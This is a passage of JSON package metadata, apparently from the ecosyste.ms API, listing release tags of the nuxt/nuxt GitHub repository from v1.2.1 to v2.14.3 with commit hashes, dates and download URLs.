759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1